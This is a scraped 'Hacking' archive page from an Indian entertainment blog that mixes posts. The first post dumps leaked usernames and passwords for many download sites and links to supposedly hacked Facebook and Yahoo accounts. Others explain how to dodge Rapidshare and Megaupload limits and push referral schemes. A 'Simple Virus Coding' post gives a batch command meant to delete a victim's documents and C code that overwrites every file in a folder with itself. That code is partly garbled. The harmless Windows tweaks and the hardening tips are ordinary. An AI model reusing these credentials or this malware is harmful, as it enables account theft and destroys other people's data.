Blog Designed by Pediredla Kishore Kumar Indian Entertainer: Hacking

Slideshow

  • Cute Kajal Agarwal

    Telugu Movie WP
  • The hottest lips are seeing red

    Actress WP
  • 17 Cheating Pictures Collection

    Adults Only
  • 10 Unique Houses From Around the World

    Scenery Wallpapers
  • Small Birds have big Love

    Birds WallPapers
  • Cute Kiss

    Love Wallpapers
  • Black Taj Mahal

    Truth About Blak Taj Mahaal
  • India Festival Art painting

    Oil Pinting Wp
  • beautiful sceneries wallpapers

    Scenery WP
  • Cat And Bird Cute Friendship

    Birds WP
  • ed ed 6 Most Popular Ways Of Couple Hugging

    Adults WP
  • Indian Village Paintings

    Oil Pinting Wp
  • Awsome moments on well & girls

    Oil Painting Wp
  • hansika visits simbu birthday party

    Actress WP

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Latest Hacked Premium Accounts | Free Working Premium Accounts

Subject: Latest Hacked Premium Accounts | Free Working Premium Accounts 

Rule:

(1) Do Not Change Passwords.
(2) Do Not Post Any Request.
(3) Share Premium Accounts Here.

Premium Accounts:

http://www.dollarwarez.com
Username:-e2ZTjs
Password:-zqObNO

http://www.fulldownloads.us
Username: Af872HskL
Password: XjsdH28N

http://www.warezquality.com
Username: ageg2020
Password : z8fsDfg3

http://www.demonoid.com
Username: 'komfuzzled'
Password: 'poniuk0unzyu'

http://www.megashare.com
Username: mansurali_1@yahoo.com
Password: 449d4a0a38457

Username: xthilakx@gmail.com
Password: 4497f13977f99

http://www.warezreleases.com
Username: HnRPxKQz
Password: a59KBV7

http://www.pirateaccess.com
Username: yourfrienddalat@gmail.com
Password: CHh5LKPI

http://divxcrawler.com/
Username:divx273
Password:8342729

rapidshare.com
USERNAME= 8010014
PASSWORD= 8j24M8EZ

USERNAME:-indianhackerhere
PASSWD :- indianhacker

Username: coolfonts
Password: rushabh

Username = bauer6210
Password = sallyp
Expiration date = Tue, 24. Feb 2009
Status = Good account!


Username = 7303316
Password = DNvyffY2
Expiration date = Tue, 17. Feb 2009
Status = Good account!

Facebook
Hacked Accounts:
Downoad: http://adf.ly/6gDO9

http://www.sharingzone.net
Username : LODMQYHX
Password : 375021402
Receipt :4T5W89RD

http://www.divxcrawler.com
Username: divx273
Password : 8342729

http://www.butterflydownloadnetwork.com
Username : cinemanetwork20
Password : butterfly20

Rapidshare.com
USERNAME= 8010014
PASSWORD= 8j24M8EZ

http://www.fullreleasez.com/
Username: Af872HskL
Password:XjsdH28N

www.buymixtapes.com
User name: comcast
Password: yummy88

http://www.fulldownloads.us
Username:Af872HskL
Password: XjsdH28N

Yahoo Hacked Accounts:
Download: http://adf.ly/6gF2D

www.tvadvanced.com
Username : mv03dl
Password : frmvdl

www.gamedownloadnow.com
Username : ga20me
Password : ke01feb

wwww.warezreleases.com
Username : HnRPxKQz
Password : a59KBV7

Username : a25bipZP
Password : 1TeVnoJb

Username : SHYyJfWU
Password : P4K20uO

\\ ENJOY \\

Read more


Earn upto Rs. 9,000 per month (without any investment)


Earn upto Rs. 9,000 pm with PaisaLive.com!
Hi ,

I have something interesting for you - you can easily earn regular income online via PaisaLive.com!
It’s really amazing! You get paid to open & read the contents of PaisaLive mails. You also receive special discount coupons, promotions and free passes to various events in your city.

Join now and get Rs. 99 instantly, just for joining. What more, as a special bonus you get paid for inviting your friends also!

Create your PaisaLive Account & refer your friends to earn launch referral bonus on every new registration.
http://www.PaisaLive.com/register.asp?1703684-4906599


Iam sure you will earn without investment.

Read more


LEGALLLY OWN A RAPIDSHARE 1 year PREMIUM ACCOUNT

Follow these steps:
1. Create a paypal PREMIUM Account at this address. It is free;

http://www.paypal.com

When asked for credit card details simply say cancel. You do not need to fill it.

2.Then go to the following link;
http://www.AWSurveys.com/HomeMain.cfm?RefID=kartik_shah

Join this site. It is also free. You get paid for completing surveys over there 6$ to 4$ dollars per survey and 1.25$ per referral thats a lot u will get a
premium account of 1 year in weeks time ......i myself have a 1 year premium account and now i am collecting some exta cash .

4.. Another thing you can also use paypal money to buy stuff on ebay and other shopping sites.

5. Thats is it. So Simple and I swear it works

Read more


Hacking Windows SEND TO MENU

Hacking Windows SEND TO MENU
  How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use the same later.

5. DONE.

Read more


HACK or Simply Change XP Start Button Name

HACK or Simply Change XP Start Button Name
 
  I’ve read a number of articles on the internet about changing the text on the Start button in XP. On more than one occasion I’ve seen references to a five (5) letter limitation when the button is renamed. I always wondered if this was true or just an assumption someone made because the default ‘start’ just happened to fit the button size. So, I decided to run a test and see if there really was a five character limit.
First of all just u need to do is download Resource hacker.
Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.

ll its just 541Kb in the size.. Click here to go to the Download Page
 
Download Resource Hacker
First Step The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe
The category we are going to be using is String Table In Resource Hacker. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable as shown in Fig. 02. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry

Second Step – Modify the Registry Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open: field. Navigate to:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

the Right pane (Fig. 05), double click the Shell entry to open the Edit String dialog box as shown in Fig. 06. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.

Read more


Youtube and Google Video Tricks

Youtube and Google Video Tricks
              As we all know that none of the video sharing sites provide a link to download their videos. So we will have to do some tweaking and play around to download the videos. Here are some ways to download any video from the internet , they are based on the common hack (Right-click -> "Save Target As" OR copy the link into your download manager, but change the file extension to .flv)

Method 1: For Firefox Users - Install the VideoDownloader Extension from Mozilla Add-ons website - It downloads all embedded objects on a webpage including the video clips. This is very easy for beginners.

Method 2: One of the easiest ways is to copy your video URL and paste it on KeepVid Lite. When you click submit, you will be provided with a link to save the video as an FLV file.
Using these tricks you can easily download videos from Youtube or Google Videos or Metacafe.

Now some more questions that arise are:

How do I play FLV files on my computer - They dont open with windows media player or winamp or itunes or real player ?

You can download free FLV players to watch FLV files locally. A good FLV player has a simple and easy-to-remember name - FLV Player. Another nice alternative is the Riva FLV player. Try them out.

How do I split a large FLV file into smaller playable video clips?

This is the most common question among video enthusiasts - they want to split a large FLV video file into smaller chunks for editing or resharing only the interesting tidbits on the internet. To break an FLV file, get the free FLV Parser - a tiny command-line tool to split FLVs into pieces. Its intended use is to convert a large FLV into a series of shorter FLVs based on a series of millisecond-based timecodes. Using the -s switch will split the audio and video of the outputted files; the audio track will be extracted as a series of MP3 files, and the short FLVs produced will have no audio track at all.

How to convert FLV videos to Windows AVI or Quicktime MOV or 3GP formats ?

The free Simplified Universal Player Encoder & Renderer software from Super can convert FLV files to practically any other video format including MP4, MOV H.264, AVI, ASF or Flash SWF animations. Super video convertor.

How do I convert my AVI, MPEG, MOV, 3GP movie clips back to FLV format ?

Say you complete editing your movie in Windows Movie Maker or Avid and now left with an MOV file that you want to convert to FLV. Just get the free Riva FLV encoder and relax. The Riva encoder even lets you select parts of the video that you want to convert to FLV and crop the rest.

I have three small video clips that I download from Google Videos and now want to join them into one single video -How do I merge FLV files ?
There is no free software that lets you join FLV files other than the expensive Macromedia Flash Professional. However, here's a simple trick to join several flv video files - convert individual flv files to avi using Super [as mentioned above], then join the multiple Avi files into a single avi file using free VirtualDub and finally convert this avi back to FLV using Riva FLV encoder.Its done.

How do I watch Youtube Video on my iPod, PSP or Television ?

Again we'll make use of the Super Video Encoder mentioned above. Just convert the FLV file into a corresponding format (like Apple iPod or Sony PSP or MPG) and transfer it to your gadget

Read more


Secure Yourself from Hackers & Hijackers

Secure Yourself from Hackers & Hijackers
 
 

Hackers and Browser Hijacking is one area of the Net that affects everyone at some stage.

In addition to having third party utilities such as SpyBot, Anti Virus scanners and firewalls installed there are some changes that can be made to Windows 2000/XP. Below are some details to make your system safer from hackers and hijackers.

Some of these tips require editing of the Registry so it is wise to either backup the registry and/or create a Restore Point.
1. Clearing the Page File at Shutdown
Windows 2000/XP paging file (Sometimes called the Swap File) can contain sensitive information such as plaintext passwords. Someone capable of accessing your system could scan that file and find its information. You can force windows to clear out this file.

In the registry navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management and add or edit the DWORD ClearPageFileAtShutdown. Set it to 1.

Note that when you do this, the system will take much longer to shut down: a system with a really big Page File (! Gig or more) may take a minute or two longer.

2. Disable the POSIX and OS/2 Subsystem.

Windows 2000 and XP come with little-documented subsystems it at allow compatibility with UNIX and OS/2 systems These rues systems are enabled by default but so rarely used that they are best off bring disabled completely to prevent possible service hijackings.

To disable these subsystems, open the registry and navigate to HKEY LOCAL MACHINESYSTEMCurrentControlSetControlSession ManagerSubSystems. Delete the subkeys Os2 and Posix. then reboot.
 
3. Never leave default passwords blank.
On installation, Windows 2000 sets up an Administrator account with total
system access and prompts for a password. Guess what: by default, it allows that password to be blank. If a user doesn't want to type a password, he can simply click Next and the system will be an open door for anyone who wants to log on. Always opt for a password of some kind when setting up the default account on a machine.
4. Disable the Guest account
Windows XP comes with a Guest account that's used for limited access, but it's still possible to do some damage with it. Disable it completely if you are not using it. Under Control Panel, select User Accounts, click on Guest Account and then select Turn Off the Guest Account.
5. Install Windows In a different directory.
Windows usually installs itself in the WINDOWS directory.
Windows NT 4 0 and 2000 Will opt for WINNT. Many worms and other rogue programs assume this to be the case and attempt to exploit those folders files. To defeat this install Windows to another directory when you're setting it up - you can specify the name of the directory during setup. WINDIR is okay; so some people use WNDWS - A few (not that many) programs may not install properly if you install Windows to another folder but t hey are very few and they are far between

6. Fake out hackers with a dummy Administrator account
Since the default account in Windows 2000 is always named Administrator, an enterprising hacker can try to break into your system by attempting to guess the password on that account. It you never bothered to put a password on that account, say your prayers.

Rather than be a sucker to a hacker, put a password on the Administrator account it you haven't done so already. Then change the name of the Administrator account. You'll still be able to use the account under its new name, since Windows identifies user accounts by a back-end ID number rather than the name. Finally, create a new account named Administrator and disable it. This should frustrate any would -be break-ins.

You can add new accounts and change the names of existing accounts in Windows 2000 through the Local Users and Groups snap in. Right-click on My Computer, select Manager, open the Local Users and Groups subtree, look in the Users folder and right-click on any name to rename it. To add a new user, right-click on the containing folder and select New User. Finally, to disable an account, double-click it, check the Account is disabled box and click OK.

Don't ever delete the original Administrator account. Some programs refuse to install without it and you might have to log in under that account at some point to setup such
software. The original Administrator account is configured with a security ID that must continue to be present in the system.

7. Set the Hosts file to read-only to prevent name hijacking.
This one's from (and to a degree, for) the experts. The HOSTS file is a text file that all flavors of Windows use to hold certain network addresses that never change. When a network name and address is placed in HOSTS, the computer uses the address listed there for that network name rather than performing a lookup (which can take time). Experts edit this file to place their most commonly-visited sites into it, speeding things up considerably.

Unfortunately hijackers and hackers also love to put their own information into it - redirecting people from their favorite sites to places they don't want to go. One of the most common entries in HOSTS is local host which is set 1770.0.1. This refers to the local machine and if this entry is damaged the computer can behave very unpredictably.

To prevent HOSTS from being hijacked, set it to read-only. Go to the folder %Systemroot%system32driversetc, right-click on HOSTS, select Properties check the Read-Only box and click OK. If you want to add your own entries to HOSTS, you can unprotect it before doing so, but always remember to set it to read-only after you're done.
8. Turn off unneeded Services
Windows 2000 and XP both come with many background services that don't need to he running most of the time: Alerter,
Messenger, Server (If you're running a standalone machine with no file or printer shares), NetMeeting Remote Desktop Sharing, Remote Desktop Help Session Manager (the last two if you're not using Remote Desktop or NetMeeting), Remote Registry, Routing and Remote Access (if you're not using Remote Access), SSDP Discovery Service, Telnet, and Universal Plug and Play Device Host.
A good resource and instruction on which of these services can be disabled go to /http://www.blkviper.com/WinXP/
 
9. Disallow changes to IE settings through IE
This is another anti hijacker tip. IE can be set so that any changes to its settings must be performed through the Internet icon in the Control Panel, rather than through IE's own interface. Some particularly unscrupulous programs or sites try to tamper with setting by accessing the Tools, Options menu in IE. You can disable this and still make changes to IE's settings through the Control Panel.

Open the Registry and browse to HKEY_CURRENT_USER SoftwarePoliciesMicrosoftInternet ExplorerRestrictions. Create or edit a new DWORD value named NoBrowserUptions and set it to 1 (this is a per-user setting). Some third-party programs such as Spybot Search And Destroy allow you to toggle this setting.

You can also keep IE from having other programs rename its default startup page, another particularly annoying form of hijacking. Browse to HKEY.CURRENT USERSoftwarePolicies MicrosoftInternet ExploreControl Panel and add or edit a DWORD, Homepage and set it to 1.

10. Disable simple
File Shares.
In Windows XP Professional, the Simple File Sharing mode is easily exploited, since it
抯 a little too easy to share out a file across your LAN (or the NET at large). To turn it off, go m My Computer, click Tools, Folder Option and the View tab, and uncheck Use Simple file sharing (Recommended). Click OK. When you do this you can access the Security tab in the Properties window for all folders; set permissions for folders; and take ownership of objects (but not in XP Home)

Read more


How to hack Rapid share and Mega upload

How to hack Rapid share and Mega upload

 
 
Hi all, This is for those who have to wait for about an hour after downloading certain amount of stuff from rapid share. To overcome this time constraint follow these steps:
RAPID SHARE
Method 1
1.open your rapid share link
2.then click on free.
3.As soon as timer start type this in address bar and click enter
javascript:alert(c=0)
4.a pop up message will come click ok your counter is zero just download the stuff
 
Method 2
1.Delete the cookies in your browser internet explorer or Firefox or opera or whatever u use).
2.Press start->run,type cmd.
3.In the command prompt,type ipconfig/flushdns press enter.Then type ipconfig/release,then ipconfig/renew .Now type exit.
4.Now try downloading, for many people this may work if their ISP provides a dynamic ip
Method 3
1.Just switch off your router or modem) and switch it back on.
2.This may work for some users Mtnl and Bsnl) and maybe some others too.

Actually these methods generally work for those people whose ISP gives them dynamic ip.
If these don't work then one more thing that can be done is to use proxies.
Method 4
1.Download the software Hide ip platinum

2.Run it, then it will automatically chose a proxy (ip of a different country) for you. So you can easily download without any restrictions. You just have to change the proxy each time you download.
 
MEGA UPLOAD

Mega upload is very easy to hack to solve the download slots problem). Just go to http://leech.megaleecher.net/
Here you will find a place to put your original link. Put it there press enter and then you will get a direct link within some seconds. You are done!!!!!

Read more


SIMPLE VIRUS CODING

SIMPLE VIRUS CODING
 
 

Run this on your own responsibility*/

VIRUS CODE-1

IT DELETES THE MY DOCUMENTS FOLDER OF UR ENEMY.
HERE'S WHAT U SHOULD DO
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT WITH BAT FILE Extention.
I MEAN SAVE IT LIKE VIRUS.BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
Code Is Below
rmdir C:\Documents and Settings \S\Q.


Run this on your own responsibility*/
VIRUS CODE-2
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......


#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Read more

Total Pageviews

Clock

Popular Posts

My site Traffic

Web hosting for webmasters